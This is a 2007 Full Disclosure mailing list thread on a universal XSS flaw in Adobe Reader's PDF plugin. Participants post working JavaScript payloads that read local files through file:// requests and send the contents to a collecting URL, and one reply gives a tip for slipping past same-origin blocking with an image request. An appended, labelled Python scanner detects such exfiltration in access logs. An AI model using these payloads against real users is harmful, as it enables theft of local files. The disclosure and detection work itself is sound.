Full Disclosure mailing list archives
Re: Universal XSS with PDF files: highly dangerous
From: "pdp (architect)" <pdp.gnucitizen () googlemail com>
Date: Thu, 4 Jan 2007 21:22:08 +0000
I just skimmed through your code very quickly and I noticed a single problem. Don't send the captured data with another XHR (xhr2). Use images:

    var img = new Image();
    img.src = url;

This should work.

On 1/4/07, T Biehn <tbiehn () gmail com> wrote:
I'm trying to put together a demonstration of this vulnerability, and how it could affect corporate security; however, I'm encountering a large hangup when sending a file 'back' to the webserver: the browser same origin policy denies me the ability to send files to a different domain, which AFAIK is necessary for an external attacker to properly exploit this vulnerability.

Here's the code I have so far, based more or less on PDP's. Vanilla, almost PDP's (different URL, spaces removed etc.):

    file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();xhr.onreadystatechange = function(){if ( xhr.readyState == 4)alert(xhr.responseText);};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);

What I'm trying to do:

    file:///C:/Program Files/Adobe/Acrobat 6.0/Resource/ENUtxt.pdf#something=javascript:function cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 = cXHR();xhr.onreadystatechange = function(){if (xhr.readyState == 4){alert(xhr.responseText);xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText);xhr2.onreadystatechange = function(){alert('File Transferred!');};xhr2.send(null);}};xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);

Now, one would think that the LOCAL file operating mode of IE would allow the cross domain XHR request; however, this does not work (tested IE 6), I think because by default IE disallows Javascript access in the local context.

Try putting this in IE:

    file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol');

and then try it in FireFox. It won't work in IE 6, but it executes just fine in FireFox.

    function cXHR(){ //Grabs a legit XHR.
        try{ return new ActiveXObject('Msxml2.XMLHTTP'); }catch(e){}
        try{ return new ActiveXObject('Microsoft.XMLHTTP'); }catch(e){}
        try{ return new XMLHttpRequest(); }catch(e){}
        return null;
    }
    var xhr = cXHR();  //For grabbing
    var xhr2 = cXHR(); //For sending
    xhr.onreadystatechange = function(){
        if (xhr.readyState == 4){
            alert(xhr.responseText);
            xhr2.open('GET', 'http://localhost:80/whatever.htm?content=' + xhr.responseText); //Send it up, yo.
            xhr2.onreadystatechange = function(){ alert('File Transferred!'); };
            xhr2.send(null);
        }
    };
    xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm', true);
    xhr.send(null);

Anyone's input on this matter would be appreciated.

On 1/4/07, Juha-Matti Laurio <juha-matti.laurio () netti fi> wrote:

Additionally, the public PoC doesn't work on Preview version 3.0.8 (409) on OS X 10.4.8.

- Juha-Matti

Larry Seltzer <Larry () larryseltzer com> wrote:

"According to public reports, this vulnerability is addressed in Adobe Acrobat Reader 8.0."

I've actually tested it. On Reader 8 Acrobat you get a messagebox that says "This operation is not allowed"

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer () ziffdavis com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
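The point of pdp's reply is that an image load is not subject to the same-origin check that blocks the cross-domain XHR, so the captured file ends up as a plain GET with the data packed into the query string. From the receiving side that is exactly what makes it detectable: the request lands in the web server or proxy access log with an abnormally long, markup-bearing parameter value. The scanner below is an added example, not code from the thread or from any of its authors; it parses Combined Log Format lines and flags GET requests whose query parameters look like a smuggled file. The sample log lines, the `content` parameter name (taken from the thread's PoC) and the length threshold are constructed assumptions to tune per site.

```python
"""
Added example (not from the thread): flag access-log entries whose query
string carries what looks like a file payload, the pattern the thread's PoC
produces ("whatever.htm?content=" + file contents). Runs offline on
constructed sample lines in Combined Log Format.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: ip - - [ts] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Assumed thresholds, chosen for the sample below; tune them for a real site.
MAX_PARAM_LEN = 200  # one query value longer than this is worth a look
MARKUP_HINT = re.compile(r'<(?:!doctype|html|body|script)\b', re.I)


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not CLF."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return (name, decoded_length, reason) for query values that look like a file."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        reasons = []
        if len(value) > MAX_PARAM_LEN:
            reasons.append('long value (%d chars)' % len(value))
        if MARKUP_HINT.search(value):
            reasons.append('contains HTML markup')
        if reasons:
            hits.append((name, len(value), '; '.join(reasons)))
    return hits


def scan(lines):
    """Return [(ip, target, hits)] for GET lines whose query string is suspicious."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec['method'] != 'GET':
            continue
        hits = suspicious_params(rec['target'])
        if hits:
            findings.append((rec['ip'], rec['target'], hits))
    return findings


# Constructed sample: a URL-encoded HTML document smuggled into the query string.
PAYLOAD = ('%3C!DOCTYPE+html%3E%3Chtml%3E%3Cbody%3E'
           + 'ReadMe%20' * 40
           + '%3C/body%3E%3C/html%3E')

SAMPLE_LOG = [
    # constructed: ordinary page view
    '10.0.0.4 - - [04/Jan/2007:21:22:08 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # constructed: the beacon carrying a local HTML file in the query string
    '10.0.0.5 - - [04/Jan/2007:21:23:11 +0000] "GET /whatever.htm?content=' + PAYLOAD
    + ' HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    # constructed: short, harmless use of the same parameter name
    '10.0.0.6 - - [04/Jan/2007:21:24:00 +0000] "GET /whatever.htm?content=hello HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, target[:60] + '...', hits)
```

Only the second sample line is reported; the short `content=hello` request is not, which is the reason for keying on the decoded value's size and content rather than on the parameter name alone. A 404 (as here, when the collecting page does not exist) does not hide the request, because the log line is written either way.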